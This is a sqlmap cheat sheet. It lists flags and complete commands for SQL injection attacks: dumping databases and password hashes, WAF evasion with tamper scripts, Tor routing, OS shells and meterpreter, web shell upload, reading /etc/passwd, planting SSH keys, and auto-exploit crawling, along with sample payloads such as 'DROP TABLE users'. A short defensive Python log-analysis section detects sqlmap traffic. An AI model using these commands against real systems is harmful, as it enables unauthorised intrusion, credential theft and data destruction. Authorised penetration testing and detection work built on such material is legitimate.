
💉 SQLmap

Options

🎯 Target & Request Options

```bash
-u "https://exemple.com?id=*" # * marks the injection point (dynamic parameter)
-r request.txt                # file containing a raw HTTP request

# Body, cookies and headers
--data "user=*&pass=1234"
--cookie="PHPSESSID=xxx"
--headers="x-forwarded-for:127.0.0.1*"
--method=POST

# HTTPS
--force-ssl # useful with -r to force HTTPS (a request file carries no scheme)
--proxy # route traffic through a proxy, e.g. to handle a self-signed certificate
```

🛠️ Payload Customization

Advanced payload options

```bash
sqlmap --eval="import hashlib;id2=hashlib.md5(id.encode()).hexdigest()"  # run custom Python code before each request
sqlmap --sql-query="<sql_query>"                                         # execute a custom SQL statement
sqlmap --prefix="0x" --suffix="-- -"                                     # add prefix/suffix to every payload
```

Tampering & evasion

```bash
--tamper=between,randomcase # apply tamper scripts to payloads
--no-escape                 # don't escape string literals with CHAR()
--no-cast                   # don't cast retrieved values to int/bool
--hex                       # use hex encoding when retrieving data
```

📋 Dump - Listing

Databases

```bash
sqlmap --schema  # enumerate the DBMS schema
sqlmap --dump    # dump table entries

sqlmap --dbs      # list databases
sqlmap --tables   # list tables
sqlmap --columns  # list columns
sqlmap -D <db> -T <table> -C <column(s)> --dump # dump specific values

sqlmap --current-user  # current DBMS user
sqlmap --current-db    # current database
sqlmap --passwords     # DBMS user password hashes
```

DBMS versions

```bash
sqlmap --dbms=<database> [<version>] # version is optional
sqlmap --dbms=mysql
sqlmap --dbms="Microsoft SQL Server"
```

🧠 Detection & Techniques

```bash
--technique=U    # use only UNION-based injection
--level=5        # test more parameters (headers, cookies, etc.)
--risk=3         # allow riskier payloads (e.g. heavy queries)
```

Injection Detection Methods

```bash
--string="Welcome admin"  # detect success via response content
--regexp="(?i)Welcome"    # use a regex to detect success in the response
--code=200                # expect this HTTP status on success
```

Time-Based Settings

```bash
--time-sec=5    # seconds of delay expected from time-based payloads
--delay=1       # wait between each request
--timeout=10    # max seconds to wait for a response
```

Injection Strategy Control

```bash
--skip-waf             # skip WAF/IPS detection heuristics
--smart                # only run thorough tests on parameters that pass the heuristic check
--predict-output       # predict common query output to save requests
```

🧅 Proxy and TOR

```bash
sqlmap --proxy="http://127.0.0.1:8080"
sqlmap --proxy="socks5://user:pass@127.0.0.1:8080"
sqlmap --tor # route through Tor
sqlmap --tor-type=SOCKS5
sqlmap --check-tor # check that Tor is actually being used
```

🛰️ RevShells

```bash
sqlmap --os-shell
sqlmap --sql-shell
sqlmap --os-pwn # meterpreter
sqlmap --file-write=/root/.ssh/id_rsa.pub --file-dest=/home/user/.ssh/ # write an SSH key (flag is --file-dest)
```

🔧 Utils

⚙️ Core Options / Setup

```bash
--flush-session   # discard the saved session for this target
--batch           # never ask for input, use default answers
--threads=5       # parallel requests
--retries=3       # retry failed requests
```

🔍 Discovery & Recon

```bash
-p "*"                # test all parameters
-p id,user            # test specific parameters
-g "site.com index"   # use a Google dork to pick targets
--identify-waf        # try to detect WAF presence
--banner              # get the DBMS banner
--is-dba              # check if the current user has DBA rights
```

🔐 Privilege & Session Info

```bash
--privileges          # show the current user's privileges
--roles               # list database roles
--users               # list DBMS users
--current-user        # show the current DBMS user
--current-db          # show the current database
--passwords           # dump user password hashes if possible
```

🎛️ Injection Tuning & Strategy

Techniques

```bash
# --technique (default "BEUSTQ")
sqlmap --technique=B
```

| Technique | Description | Example |
|---|---|---|
| `B` - Boolean-based blind | Exploits conditional responses (true/false). | `id=1 AND 1=1 --` (true) vs `id=1 AND 1=2 --` (false) |
| `T` - Time-based blind | Uses response delay to infer SQL injection success. | `id=1 AND SLEEP(5) --` |
| `E` - Error-based | Extracts data through SQL error messages. | `id=1'` causing a database error that reveals information |
| `U` - Union-based | Uses `UNION SELECT` to fetch data directly in the response. | `id=1 UNION SELECT username, password FROM users --` |
| `S` - Stacked queries | Executes multiple SQL queries in one request (requires `;`). | `id=1; DROP TABLE users --` |
| `Q` - Inline queries | Executes subqueries inside the main query. | `id=(SELECT database())` |

Bypass - Technicals and options

Tamper (Scripts to Bypass)

```bash
# List tamper scripts
sqlmap --list-tamper

sqlmap --tamper=script1,script2
```

Other options to bypass

```bash
sqlmap --randomize=user,password # randomize the value of the given parameters on each request
sqlmap --random-agent            # random User-Agent
sqlmap --test-filter="boolean"   # only run tests whose title contains "boolean"
```

Difficulty

```bash
# Difficulty
sqlmap --level="<1-5>"
sqlmap --risk="<1-3>" # (Warning in production)
```

| Level | Description | Payload Examples |
|---|---|---|
| 1 | Basic tests, faster, fewer payloads. | `' OR 1=1 --`, `' AND 1=1 --` |
| 2-3 | Slightly more complex; tests a wider range of payloads and techniques. | `' OR 1=1 LIMIT 1 --`, `1' AND 1=1 --`, `' OR 1=1 GROUP BY NULL --` |
| 4-5 | Advanced tests, more payloads, complex techniques, slower. | `1' UNION SELECT NULL, username, password FROM users --`, `1' AND SLEEP(5) --` |

⚠️ Note: --level=5 sends advanced, heavily encoded payloads to bypass firewalls, but it may miss basic injections such as `' OR 1=1 --`.

Payload

```bash
# aggressive scan against a saved request
sqlmap -r request -p id --level=5 --risk=3 --dbms=mysql --os-shell --random-agent --threads=10
```

Crawling & auto-exploit

(Warning in production.) This crawls the site, submits forms and auto-exploits what it finds, so it can delete or corrupt sensitive data.

```bash
sqlmap -u "http://example.com/?id=*" --crawl=1 --random-agent --batch --forms --threads=10 --level=5 --risk=3
```

```bash
# WAF bypass
sqlmap -r request --level=5 --dbms=mysql --os-shell --tamper=space2comment,charencode,between,randomcase --random-agent --proxy=https://example.com --threads=10
```
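A defender-side counterpart to the technique letters in the table above and the tamper scripts used in this command. This is an added example, not sqlmap's code and not from the original page: it undoes what charencode, space2comment and randomcase do to a request parameter, then tags each access-log line with the technique letter (B/T/E/U/S) it resembles or with sqlmap's default User-Agent. The log lines, IPs and signature set are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache-style access-log lines (sample input only, not from any real host).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=1%20AND%201=1-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=1%27/**/uNiOn/**/sElEcT/**/NULL,username,password/**/FROM/**/users-- HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /?id=1%20AND%20SLEEP(5)-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /?id=1%3BDROP%20TABLE%20users-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /?id=42&user=bob HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# One signature per sqlmap technique letter (B/T/U/S); E is detected from an unbalanced quote.
SIGNATURES = {
    "B": re.compile(r"\b(?:and|or) \d+ ?(?:= ?\d+|not between \d+ and)"),   # also matches the 'between' tamper form
    "T": re.compile(r"\b(?:sleep|benchmark|pg_sleep) ?\(|\bwaitfor delay\b"),
    "U": re.compile(r"\bunion(?: all)? select\b"),
    "S": re.compile(r"; ?(?:select|insert|update|delete|drop|exec|shutdown)\b"),
}

def normalize(value: str) -> str:
    """Undo what charencode, space2comment and randomcase do, so one signature set suffices."""
    for _ in range(3):                            # repeated percent-decoding (double encoding)
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value)       # inline comments back to spaces
    return re.sub(r"\s+", " ", value).lower()     # collapse whitespace, ignore case

def analyze(line: str):
    """Return a finding for a suspicious log line, or None for a clean one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    techniques = set()
    for _, raw in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        value = normalize(raw)
        techniques |= {t for t, rx in SIGNATURES.items() if rx.search(value)}
        if value.count("'") % 2:                  # unbalanced quote: error-based probe (E)
            techniques.add("E")
    sqlmap_ua = m["ua"].lower().startswith("sqlmap/")   # default UA unless --random-agent is used
    if not techniques and not sqlmap_ua:
        return None
    return {"ip": m["ip"], "status": int(m["status"]), "techniques": sorted(techniques), "sqlmap_ua": sqlmap_ua}

def scan(lines):
    return [f for f in map(analyze, lines) if f]
```

Feed `scan()` your own access log to see which technique letters and tamper forms a WAF or detection rule would have to account for.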

File

```bash
# upload a web shell
sudo sqlmap -r request --file-write=shell.php --file-dest=/var/www/shell.php

# read a file
sqlmap -u "http://example.com/?id=*" --file-read=/etc/passwd
```

Dump

```bash
# dump specific columns
sqlmap -r request -D db_name -T users -C username,password --dump

# dump the current database
sqlmap -r request --dbms=mysql --dump

# dump all databases
sqlmap -r request --dbms=mysql --dump-all

# connect directly and dump
sqlmap -d "mysql://user:pass@ip/database" --tor --dump
```

Resources